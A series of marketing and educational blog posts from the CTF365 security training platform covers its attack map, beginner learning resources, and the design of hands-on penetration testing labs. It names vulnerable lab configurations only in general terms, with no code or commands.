CTF365 Helps Open Source Projects to improve their Security:

When open source projects are in scope, CTF365 can be used as a web testing platform to help find security issues. We’ve already made it public and invited all Open Source founders to use it. You can read the announcement HERE.

Improving InfoSec Training Core Capabilities for Companies/Organizations

Today’s penetration testing labs are used for many reasons. Trainers use them to teach information security to students, security software companies use them to provide product training to customers, security professionals use them to test new tools and tactics, and system administrators use them to practice defensive security. The list goes on but, ultimately, it’s evident that penetration testing labs play an important role in security education and training.

By adding CTF365 as a layer to your penetration testing lab, you’ll provide your users with an experience that is more engaging and entertaining. Also, because of its continuous user presence and constantly changing environment, CTF365’s design is more dynamic than conventional penetration testing labs.


Flexibility:

We’ve created a flexible infrastructure that allows users to create their own infrastructure. CTF365’s platform flexibility also allows users to connect their existing infrastructure whenever and wherever needed.

Who CTF365 is for (but not limited to):

  • Security Training Companies – educational, continuous training, learning, and improvement
  • InfoSec Vendors (Cisco, McAfee, Rapid7, etc.) – product testing through gamification and crowdsourcing
  • InfoSec Organizations (OWASP, ENISA, etc.) – improving and increasing Internet security awareness
  • InfoSec Conferences – entertaining, challenging, and community driven
  • Security Management Companies – continuous training and improvement
  • Red, Blue, CERT/CSIRT Teams
  • Information Security Recruiters
  • CS Faculties – educational, challenging, and hands-on
  • Web Development Companies – improving and training for defensive security
  • Web Hosting Companies – defensive security training
  • Data Centres

Two Years Startup Journey:


In November 2012 we made our first announcement about CTF365. It’s been two amazing years of dedication and development, disappointment and excitement, and fails and achievements. Best bumpy ride ever. Aside from a great team and our determination to do the right thing, one thing stood out – The InfoSec Community.


On behalf of the CTF365 Team, I’d like to thank all of the community members who trusted and supported us. Thanks to those of you who didn’t trust us but supported us anyways. And thanks to those of you who bullied us. You drove us and made us committed to success. Thank you all.

About CTF365: CTF365 is a top-notch Security Training Platform for the IT industry with a focus on Security Professionals, System Administrators and Web Developers that offers five-star services. The Platform implements CTF concepts and leverages gamification mechanics to improve retention rates and speed up learning/training curves when it comes to Information Security.

Interactive Cyber Attack Map


Over the last 6 months, we’ve seen several large companies develop and launch their own “cyber attack map.” So we decided to curate a list of the most popular maps for your convenience. If you’re aware of another map, please tell us about it so we can add it.

Attack Maps:

  • Deutsche Telekom – Sicherheitstacho.eu
  • Google Ideas + Arbor Networks – Digital Attack Map
  • Honeynet Project – HoneyMap
  • Norse Corporation – Norse – IPViking Live
  • Kaspersky – Find out where you are on the Cyberthreat map
  • FireEye – Cyber Threat Map

Some of these maps are so intricate that they appear to be organic, whereas the other maps are relatively simplistic. All of these maps, however, state that they allow you to monitor cyber attacks in real time. Live cyber attack observation is pretty cool, and it also makes for a nice marketing tool.

At CTF365, we think real time cyber attack maps are awesome. So we decided to build one of our own. When we started working on our map, we focused on two elements: user experience and information accessibility. By positioning these elements at the foundation of our map, we were able to create a close to real time cyber attack monitoring system that is engaging, interactive, and insightful. It’s more than a map; it’s a window into the core of the CTF365 security training platform.

Today we present our Interactive Cyber Attack Map.


Interfacing with the map is as easy as pointing and clicking. Through the various interactive components, users can identify active attackers, discover fortresses, and more. By measuring attacks on a visible surface, we’ve made it effortless for users to monitor the status of their fortresses and trace attacks back to the perpetrators. In a sense, the map is a less complex alternative to Nmap and IDS and the awesomeness is that users and CTF365 unregistered visitors can watch how attacks occurs.


The map is currently in its infancy and, therefore, is still being developed. New features will be added in the near future. Upon completion, the map will act as a comprehensive real time cyber attack monitoring system. If you’re looking to gain a new perspective on CTF365, the map is a great place to start.

You can access the map HERE.


Starting Point Guide for Security Professional Wannabes


In 2014, several financial institutions and other large corporations — including Sony, Target, J.P. Morgan, eBay and Home Depot — were hacked. These incidents prove that security breaches do not discriminate, and show that security weaknesses can lead to significant damage. Information Security is a $79.9 billion market and is expected to create demand for 4.9 million professionals by 2017. This, together with a 34% increase in security education and training, ranks Information Security Professional among the hottest jobs.

Because I receive so many questions regarding security and ethical hacking education for beginners, I curated a short but comprehensive list of free resources. This article is for those of you who need a starting point and some direction towards becoming an information security professional. Based on my experience, the resources mentioned below provide a useful starting point; however, they aren’t the only high quality resources out there, so feel free to share and comment.

If you’re a programmer or a system administrator, transitioning to a role in security will be much easier. A programming background inherently strengthens your ability to understand security tools, concepts, and common practices. A background in system administration will allow you to effectively build on your existing knowledge of network infrastructure and Internet protocols, and help you to better understand defensive strategies at the network layer.

If you don’t have a technical background, there’s no need to panic. You can still work towards a career in security. “Every security professional was a skiddie at the beginning” — a saying reminding us that we all started somewhere. Like anything else, security is a skill that is developed through hard work and dedication.

Finding Tools and Building Your Arsenal

Open source security auditing and penetration testing applications are your most valuable assets. When you need to find security tools, Google is your best friend; however, you can start here at SecTools. You can also find lots of open source tools on Github.

Check out these survey results to find out which tools others are using.

Setting up Your Training Environment

When practicing offensive and defensive security, never use your primary operating system. Instead, use a virtual machine. There are a number of desktop virtualization solutions available but we recommend Oracle’s VirtualBox because it’s free and cross-platform compatible.

The following video will show you how to create a Kali Linux virtual machine in VirtualBox:

Choosing Your Test Targets:

To practice offensive security, you need a target. There are plenty of “Vulnerable by Design” machines out there, but we recommend Metasploitable and HacmeBank. Metasploitable is Linux-based, whereas HacmeBank is Windows-based.

If you have a Free Account on CTF365, you can access Metasploitable in the cloud to train your hacking skills. The advantage is that you don’t need to create a virtual machine or make configurations — we do everything for you. Another advantage is that, because it’s online, it simulates an authentic target and gives you a real life feel. Alternatively, you can find a variety of “Vulnerable by Design” machines at VulnHub.

The Book:

There are hundreds of security books, and some of them are even free; however, we recommend one in particular to begin with — Metasploit Unleashed. We recommend Metasploit Unleashed because:

  • It’s written and published by one of the best, well known security training companies — Offensive Security.
  • It combines reading with practical experience and uses Metasploitable as a training lab.

Video Tutorials:

Chris Haralson’s YouTube channel is one of the best sources of high quality security training video tutorials. We recommend Chris’ channel because his videos are:

  • Clear, concise and well organized.
  • Detail oriented and noob proof.
  • About 7 minutes long on average.
  • Reliable and accurate.

Chris created the following Metasploitable tutorial for CTF365 users:


Currently, there is no single institute or website that can take you from zero to hero. The Internet is littered with free InfoSec resources, but it’s up to you to find them. Just remember that not all of them are credible. Take this infamous example from NextGenHacker101, with over 1.4 million views.

Have anything to add or comment? Please do so.

Designing Security Training Labs – Next Generation


Information security training labs are a very important component when it comes to teaching information security, showcasing security software, and training your customers to use that software and get the best out of it. Depending on a few factors (lab complexity and size, user experience, etc.), security training labs are delivered either online via VPN or as simple VM images on physical media (USB, CD, etc.).

To understand what the perfect security training lab should look like, we’ve asked security training managers, information security instructors and CS teachers (who teach network security) two questions:

  1. What are the problems with your current security training labs?
  2. What would a perfect security training lab look like?

Some of the answers were more product-centered, others were more general, but the ideas and vision are pretty clear.

Problems with actual security training labs:

  • Stability i.e. systems that were crashing or becoming unresponsive
  • Slow
  • Small and uninteresting (not really representative of the actual internet), which makes it boring
  • Volatility i.e. a vulnerability might disappear over night due to a change in setup

The perfect Security Training Lab:

Here is what people are looking for in a training lab environment:

  • An instance of Kali.
  • An instance of Metasploitable2.
  • An instance of RHEL with common vulns (vulnerable Apache/Tomcat/Java-RMI).
  • A local SMTP mail relay with a web-based mail client for social engineering campaigns.
  • A Windows Domain Controller (W2k8).
  • A Windows 2k8 SQL Server with common SQL vulns (for example, blank sa password and MSSQL xp_cmdshell).
  • A Windows 7 client, unpatched and with vulnerable apps (Java, Adobe Reader, Flash, browsers, etc.).
  • A Windows 8 client, unpatched and with vulnerable apps (Java, Adobe Reader, Flash, browsers, etc.).

In addition to the above, these systems would need to be configured in a way that allows the student to exercise the following functionalities:

  • Remote exploits
  • Local exploits
  • Brute force password attacks
  • Credentials domino meta-module
  • Pass-the-hash
  • Social engineering campaign (i.e. set up a campaign, relay a phishing email through the local SMTP gateway, log into a client, retrieve the email and get pwned)

A tiered network environment where we can leverage proxy and VPN pivoting would be awesome. This should be representative of real world issues in real world environments.
Another interesting answer to “What would your dream training lab look like?”:

  • A diversity of operating systems would also be nice. For instance, it would be a “nice to have” to have a vulnerable SPARC Solaris system, to be able to demonstrate what a buffer overflow on SPARC looks like.
  • There should be a nice number of systems active (let’s say 40 or more), with a diverse set of technologies and vulnerabilities. The reason would be to not have dull vulnerability scan results, but also to be able to teach students on common vulnerabilities.
  • Another feature could be a network that is not completely flat, so that mapping out networks can be looked at. And it would also be cool to have hosts that can only be reached/attacked through pivoting via a vulnerable host for example.
  • I’ve also been thinking about a lab in which it’s possible to do traffic redirection attacks (eg. ARP spoofing), to enable testing of MITM attacks (eg. RDP MITM).
  • Another nice to have would be a system on which a vulnerability is present that makes a service crash when vulnerability scanned or when exploitation is attempted. The service should then restart automatically after a few minutes. This would be nice to show the dangers of scanning/pentesting.
  • What would also be nice is that if there’s a vulnerable server to attack during a course, it would be best if every student has his own target to attack, because a system might become unstable after an exploit and if there’s 10 people bashing on the same vulnerability in parallel… so there should be a flexible way to configure a lab instance for a number of people.
  • But most of all: it should be stable and reliable. Nothing is worse than to have to give a course and hosts are going down, network is slow, connectivity is lost, etc. …
I know it’s a lot to ask and not all that simple, but you asked what I’m dreaming 😉

Building Next Generation of Information Security Training Labs:

Because of the increasing complexity of software, the size of the internet (IoE – Internet of Everything) and the variety of attacks, information security training now demands a higher standard of training lab, and the answers above prove that there is a need for better, more sophisticated and more realistic security training labs. If you really want to learn and train in information security at a higher level, labs delivered on USB/CD are out of the question nowadays. USB/CD security labs are for entry level security professional wannabes, and there are plenty of great free resources for them.

Based on our experience at CTF365, there are some very important factors that you have to keep in mind when designing the next generation of information security training labs, whether you’re a software/hardware security vendor, a security training company, or any other information security organization:

Availability

  • Every student gets his/her own security training lab. This way you’ll avoid one student’s changes affecting another’s system, and students get what they paid for.
  • Redundancy – In case of IP failure or hardware failure.

Diversity

  • As many operating systems as possible, with a lot of applications and web applications.

Complexity

  • Tiered networks, traffic automation over smtp, ftp services etc. to mimic the real world.

Automation

  • Easy and fast deploy (e.g. three clicks and 2-3 minutes), easy to manage (create/delete/restart labs or VMs within the labs in minutes) and full monitoring.

Flexibility

  • Different modules for different trainings.


Building such a security training lab takes time, a lot of man-hours, a clear vision over its architecture and most importantly, the willingness to have it done for your customers. Awesome security training labs are important from a marketing and brand recognition point of view as well. You might have a great product that customers want (or “must have”) but if you don’t offer them proper training to use your product at its full capacity it will be a great loss in the long run.

Security Training Labs On Demand


This article is intended for information security trainers and training service managers that work in the Information Security Industry.

In a recent article I explained the necessity for and requirements needed to build the next generation of security training labs. I argued that it is important to improve security training labs and made a list of things to keep in mind when building such labs. You can read the article HERE.

The Problem:

If you’re an information security trainer that provides online trainings via VPN/VNC, chances are that you’ve heard students complain about things like:

  • “The lab server/service that I try to reach is down/doesn’t work.”
  • “The connection to the lab is way too slow.”
  • “The OSes, web applications/frameworks within the security training lab are obsolete.”
  • “Are there more servers/services other than those?”

… And, if you’re a training service manager, you’ve heard your trainer colleagues complaining about students’ complaints and trying to figure out a way to fix these issues.

No one likes complaints but listening to them and taking action is gold if we want to improve, become better at, and most important, have happy customers.

Having state of the art security training labs for your students/customers is difficult because of the constant stream of new vulnerabilities (which have to be added to your lab), new OS versions and obsolete OSes (e.g. Windows XP). Keeping such training labs up to date is also costly and requires a lot of man hours, not to mention the time spent designing, testing and deploying them.

At CTF365 we’ve developed a platform that takes this pain out of your organization. We made sure it is cost effective, easy to deploy and easy to use.

Creating a Lab:

Very easy to deploy: add a name, select a template (you can get as many templates as you need) and push “Create”.

Adding Students:


As an instructor you have full control over the labs and each of your students will get his/her own lab to train in. You’ll be able to add, delete, create and re-create machines, configure networks, routers and switches.


Your students will have control over their own labs, being able to delete, restart and recreate each machine, or the entire lab if it breaks, all with just a few clicks.

Connecting via VNC or VPN


Information security training demands a higher standard of training lab. Offering sophisticated, well designed and reliable security training labs to your students/customers is not a luxury anymore; because of the increasing complexity of software and of the attacks against it, it has become a necessity for better training.

Security Training Labs on Demand can be fully customized with different operating systems, setups and frameworks, and can be delivered as a white label product (on your company’s site). The platform will lower your costs, improve your students’ training experience and make your trainings a pleasant experience.

If you want to try it, just fill in the form to request a demo.

